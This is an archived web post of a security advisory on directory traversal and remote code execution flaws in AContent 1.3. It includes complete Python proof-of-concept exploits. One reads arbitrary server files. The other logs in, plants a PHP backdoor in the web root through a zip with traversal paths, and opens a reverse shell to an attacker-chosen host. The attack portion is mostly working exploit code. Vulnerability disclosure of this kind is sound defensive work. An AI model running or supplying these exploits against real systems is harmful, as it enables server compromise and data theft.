{"id":7664,"date":"2017-05-16T14:19:26","date_gmt":"2017-05-16T22:19:26","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/16\/news-1449\/"},"modified":"2017-05-16T14:19:26","modified_gmt":"2017-05-16T22:19:26","slug":"news-1449","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/16\/news-1449\/","title":{"rendered":"SSD Advisory \u2013 AContent Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 16 May 2017 05:32:18 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3207\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3207');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities types found in AContent version 1.3.<\/p>\n<p>AContent is an open source learning content management system (LCMS) used to create interoperable, accessible, adaptive Web-based learning content. It can be used along with learning management systems to develop, share, and archive learning materials. For those familiar with ATutor, AContent contains the content authoring, test authoring, and content interoperability features of ATutor, producing a standalone tool that can be used with any system that supports IMS content interoperability standards.<\/p>\n<p>The vulnerability found are:<\/p>\n<ul>\n<li>Directory Traversal<\/li>\n<li>Directory Traversal that lead to Remote Code Execution &#8211; question_import.php<\/li>\n<li>Directory Traversal that lead to Remote Code Execution &#8211; ims_import.php<\/li>\n<li>Directory Traversal that lead to Remote Code Execution &#8211; import_test.php<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> AContent has fixed the vulnerabilities in their GitHub master branch.<br \/> For more details:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/atutor\/AContent\/commit\/bd6f26c954b2e6891c94447d1930ab17d76dc17c\" target=\"_blank\">https:\/\/github.com\/atutor\/AContent\/commit\/bd6f26c954b2e6891c94447d1930ab17d76dc17c<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/atutor\/AContent\/commit\/a6568bc0ff8f454ed666ec8976b8665c6c55bd49\" target=\"_blank\">https:\/\/github.com\/atutor\/AContent\/commit\/a6568bc0ff8f454ed666ec8976b8665c6c55bd49<\/a><\/li>\n<\/ul>\n<p><span id=\"more-3207\"><\/span><\/p>\n<p><u><strong>Vulnerabilities Details<\/strong><\/u><\/p>\n<p><strong>Directory Traversal<\/strong><br \/> AContent is vulnerable to a Directory Traversal vulnerability. The vulnerable code can be found in file <em>tool_provider_outcome.php<\/em>.<\/p>\n<p>The second parameter passed to the <em>sendOAuthBodyPOST()<\/em> function called in <em>tool_provider_outcome.php<\/em> is vulnerable to a directory traversal that can be used to disclose files. <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0f89209289287\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/local\/bin\/python    import sys  import re  import requests    def banner():      print &#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- |&#8221;      print &#8220;t| AContent &lt;= 1.3 tool_provider_outcome.php Information Vulnerability |&#8221;      print &#8220;t| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|n&#8221;    banner()    if len(sys.argv) &lt; 3:      print &#8220;(+) usage: %s &lt;target&gt; &lt;file&gt;&#8221; % sys.argv[0]      exit(-1)    target = sys.argv[1]  file   = sys.argv[2]    print &#8220;(+) downloading %s&#8221; % file  r = requests.get(&#8220;http:\/\/%s\/oauth\/lti\/common\/tool_provider_outcome.php?grade=1&amp;key=1&amp;secret=secret&amp;submit=Send+Grade&amp;url=..\/..\/..\/..\/..\/..\/..\/..%s&#8221; % (target, file))  contents = r.text.split(&#8220;&#8212;&#8212;&#8212;&#8212; POST RETURNS &#8212;&#8212;&#8212;&#8212;&#8220;)[1].split(&#8220;&#8212;&#8212;&#8212;&#8212; WE SENT &#8212;&#8212;&#8212;&#8212;&#8220;)[0].rstrip()  print contents<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><strong>Directory Traversal that lead to Remote Code Execution &#8211; <em>question_import.php<\/em><\/strong><br \/> AContent is vulnerable to a Directory Traversal vulnerability that can lead to a Remote Code Execution. The vulnerable code can be found in file <em>question_import.php<\/em>.<\/p>\n<p>Vulnerable code can be found in lines 168-170 in <em>test\/question_import.php<\/em> <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0f91851155552\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $archive = new PclZip($_FILES[&#8216;file&#8217;][&#8216;tmp_name&#8217;]);      if ($archive-&gt;extract(  PCLZIP_OPT_PATH, $import_path,         PCLZIP_CB_PRE_EXTRACT,  &#8216;preImportCallBack&#8217;) == 0) {<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f91851155552-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f91851155552-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f91851155552-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f91851155552-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PclZip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;tmp_name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f91851155552-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">extract<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PCLZIP_OPT_PATH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">import_path<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f91851155552-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">PCLZIP_CB_PRE_EXTRACT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;preImportCallBack&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>This code calls <em>extract()<\/em> on a user supplied uploaded zip file. <\/p>\n<p>The <em>preImportCallBack()<\/em> does not check for directory traversals and performs a blacklist check on <em>teh<\/em> file extension.<\/p>\n<p>This can be used to write into the web root and gain remote code execution.<\/p>\n<p><u>Notes:<\/u><\/p>\n<ul>\n<li>Requires that the target has <em>display_errors=On<\/em> in the <em>php.ini<\/em><\/li>\n<li>Requires that you use an author account, but open registration is enabled by default<\/li>\n<li>Requires that you have at least one writable directory in the web-root, this is common<\/li>\n<li>Requires that the author has at least one course created under their account<\/li>\n<\/ul>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0f95111606370\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/local\/bin\/python    import re  import os  import sys  import time  import select  import string  import random  import zipfile  import termios  import hashlib  import requests  import threading  import SocketServer  from cStringIO import StringIO    # interactive connectback listener  class connect_back_shell(SocketServer.BaseRequestHandler):      &#8220;&#8221;&#8221;      our interactive, shell like client      &#8220;&#8221;&#8221;      def handle(self):          s = self.request          old_settings = termios.tcgetattr(0)          try:              c = True              self.close = 0              while not self.close:                  for i in select.select([0, s.fileno()], [], [], 0)[0]:                      c = os.read(i, 2048)                      if c:                          os.write(s.fileno() if i == 0 else 1, c)                          if i == 0:                              if &#8220;exit&#8221; in c or &#8220;quit&#8221; in c:                                  self.terminate()              s.close()          except KeyboardInterrupt:              return          finally:               termios.tcsetattr(0, termios.TCSADRAIN, old_settings)            return          def terminate(self,):          self.close = 1          self.server.shutdown()    class threaded_tcp_server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):      pass    def banner():      print &#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; |&#8221;      print &#8220;t| AContent &lt;= 1.3 question_import.php Remote Code Execution Vulnerability |&#8221;    def _get_hashed_password(token):      &#8220;&#8221;&#8221;      takes advantage of the authentication weakness and generates       the hash as the server expects it, see client side code      &#8220;&#8221;&#8221;      s2 = hashlib.sha1()      s1 = hashlib.sha1()      s1.update(password)      hash_stage_1 = s1.hexdigest()      s2.update(&#8220;%s%s&#8221; % (hash_stage_1, token))      return s2.hexdigest()    def _build_php_code():        phpkode  = (&#8220;&#8221;&#8221;      @set_time_limit(0); @ignore_user_abort(1); @ini_set(&#8216;max_execution_time&#8217;,0);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=@ini_get(&#8216;disable_functions&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!empty($dis)){$dis=preg_replace(&#8216;\/[, ]+\/&#8217;, &#8216;,&#8217;, $dis);$dis=explode(&#8216;,&#8217;, $dis);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$dis=array_map(&#8216;trim&#8217;, $dis);}else{$dis=array();} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(!function_exists(&#8216;LcNIcoB&#8217;)){function LcNIcoB($c){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;global $dis;if (FALSE !== strpos(strtolower(PHP_OS), &#8216;win&#8217; )) {$c=$c.&#8221; 2&gt;&amp;1\\n&#8221;;} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$imARhD=&#8217;is_callable&#8217;;$kqqI=&#8217;in_array&#8217;;&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;popen&#8217;)and!$kqqI(&#8216;popen&#8217;,$dis)){$fp=popen($c,&#8217;r&#8217;);&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;if(is_resource($fp)){while(!feof($fp)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o.=fread($fp,1024);}}@pclose($fp);}else&#8221;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if($imARhD(&#8216;proc_open&#8217;)and!$kqqI(&#8216;proc_open&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$handle=proc_open($c,array(array(pipe,&#8217;r&#8217;),array(pipe,&#8217;w&#8217;),array(pipe,&#8217;w&#8217;)),$pipes); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@proc_close($handle);}else if($imARhD(&#8216;system&#8217;)and!$kqqI(&#8216;system&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;ob_start();system($c);$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;passthru&#8217;)and!$kqqI(&#8216;passthru&#8217;,$dis)){ob_start();passthru($c); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=ob_get_contents();ob_end_clean(); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}else if($imARhD(&#8216;shell_exec&#8217;)and!$kqqI(&#8216;shell_exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=shell_exec($c);}else if($imARhD(&#8216;exec&#8217;)and!$kqqI(&#8216;exec&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$nofuncs=&#8217;no exec functions&#8217;; &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;if(is_callable(&#8216;fsockopen&#8217;)and!in_array(&#8216;fsockopen&#8217;,$dis)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@fsockopen(&#8216;tcp:\/\/%s&#8217;,&#8217;%s&#8217;);while($c=fread($s,2048)){$out = &#8221;; &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}elseif (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;){break;}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}}fwrite($s,$out);}fclose($s);}else{ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,&#8217;%s&#8217;,&#8217;%s&#8217;); &#8220;&#8221;&#8221; % (cb_host, cb_port))      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,&#8221;socket_create&#8221;);while($c=@socket_read($s,2048)){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;$out = &#8221;;if(substr($c,0,3) == &#8216;cd &#8216;){chdir(substr($c,3,-1)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;} else if (substr($c,0,4) == &#8216;quit&#8217; || substr($c,0,4) == &#8216;exit&#8217;) { &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); &#8220;&#8221;&#8221;)      phpkode += (&#8220;&#8221;&#8221;}@socket_close($s);} &#8220;&#8221;&#8221;)      return &#8220;&lt;?php %s ?&gt;&#8221; % phpkode        def we_can_login():      &#8220;&#8221;&#8221;      logs into the target      &#8220;&#8221;&#8221;      print &#8220;(+) getting server token&#8221;      r = s.get(&#8220;http:\/\/%s\/login.php&#8221; % target)      match = re.search(&#8220;) + &#8220;(.*)&#8221;)&#8221;, r.text)      if match:          print &#8220;(+) found the token&#8221;          print &#8220;(+) logging in as %s&#8230;&#8221; % username          data = {&#8216;form_password_hidden&#8217;: _get_hashed_password(match.group(1)), &#8216;form_login&#8217;: username, &#8216;submit&#8217;:&#8217;Login&#8217;}          r = s.post(&#8220;http:\/\/%s\/login.php&#8221; % target, data=data, allow_redirects=False)          if (r.status_code == 302) and (&#8220;index.php&#8221; in r.headers[&#8216;Location&#8217;]):              return True          else:              print &#8220;(-) failed to login, check your student password&#8221;      else:          print &#8220;(-) failed to get the token&#8221;      return False        def _build_zip():      &#8220;&#8221;&#8221;      builds the zip file.      we upload a .htaccess incase the webserver doesnt have       a handler for phtml extensions but typically, they do.      &#8220;&#8221;&#8221;      f = StringIO()      z = zipfile.ZipFile(f, &#8216;w&#8217;, zipfile.ZIP_DEFLATED)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/.htaccess&#8217; % fp, &#8220;AddType application\/x-httpd-php .phtml&#8221;)      z.writestr(&#8216;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..%shome\/si.phtml&#8217; % fp, _build_php_code())      z.close()      handle = open(&#8216;pwn.zip&#8217;,&#8217;wb&#8217;)      handle.write(f.getvalue())      handle.close     def we_can_upload_a_shell():      &#8220;&#8221;&#8221;      uploads a zip file with php code inside to our target for exploitation      &#8220;&#8221;&#8221;      _build_zip()      multiple_files = {          &#8216;file&#8217;: (&#8216;pwn.zip&#8217;, open(&#8216;pwn.zip&#8217;,&#8217;rb&#8217;), &#8216;application\/zip&#8217;),          &#8216;submit_import&#8217;: (None, &#8216;Install&#8217;),         }      proxies = {&#8220;http&#8221;:&#8221;http:\/\/127.0.0.1:8080&#8243;}      r = s.post(&#8220;http:\/\/%s\/tests\/question_import.php?_course_id=2&#8221; % target, files=multiple_files, allow_redirects=False, proxies=proxies)            if r.status_code == 302:          return True      return False        def _clean_up():      os.remove(&#8220;pwn.zip&#8221;)    def pop_shell():      &#8220;&#8221;&#8221;      pops a shell by making a request to the backdoor code      &#8220;&#8221;&#8221;      _clean_up()      try:          r = s.get(&#8220;http:\/\/%s\/home\/si.phtml&#8221; % target)      except:          pass    def we_can_get_fp():      &#8220;&#8221;&#8221;      gets the full path      requires some php.ini settings:      display_errors = On      &#8220;&#8221;&#8221;      global fp      r = s.get(&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221; % target)      match = re.search(&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;, r.text)      if match:          fp = &#8220;\/%s&#8221; % match.group(1)          return True      return False              def validation_of_args_are_good():      &#8220;&#8221;&#8221;      validates where the arguments are good or not      &#8220;&#8221;&#8221;      global target, cb_host, cb_port, username, password, w_lst, help_str      help_str = &#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221; % sys.argv[0]      if len(sys.argv) &lt; 4:          print help_str          sys.exit(1)      target    = sys.argv[1]      user_pass = sys.argv[2]      host_port = sys.argv[3]      if &#8220;:&#8221; not in host_port:          print &#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;          return False      elif &#8220;:&#8221; not in user_pass:          print &#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;          return False      cb_port = host_port.split(&#8220;:&#8221;)[1]      cb_host = host_port.split(&#8220;:&#8221;)[0]      password = user_pass.split(&#8220;:&#8221;)[1]      username = user_pass.split(&#8220;:&#8221;)[0]      if not cb_port.isdigit():          print &#8220;(-) you need a port NUMBER for the command back host&#8221;          return False      elif not os.access(os.getcwd(), os.W_OK):          print &#8220;(-) dont have write access in current dir!&#8221;          return False      return True      def main():      global s      s = requests.Session()      banner()      if validation_of_args_are_good():          if we_can_login():              print &#8220;(+) logged in successfully&#8230;&#8221;              print &#8220;(+) finding full path&#8230;&#8221;              if we_can_get_fp():                  print &#8220;(!) found the path at: %s&#8221; % fp                  print &#8220;(+) uploading shell&#8230;&#8221;                  if we_can_upload_a_shell():                      print &#8220;(!) shell upload successful, launching!&#8221;                      instance = threaded_tcp_server((&#8220;0.0.0.0&#8221;, int(cb_port)), connect_back_shell)                      cbserver = threading.Thread(target=instance.serve_forever)                      cbserver.daemon = True                      cbserver.start()                      pop_shell()      else:          print help_str          sys.exit(-1)            if __name__ == &#8216;__main__&#8217;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0f95111606370-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0f95111606370-25\">25<\/div>\n<div class=\"crayon-num 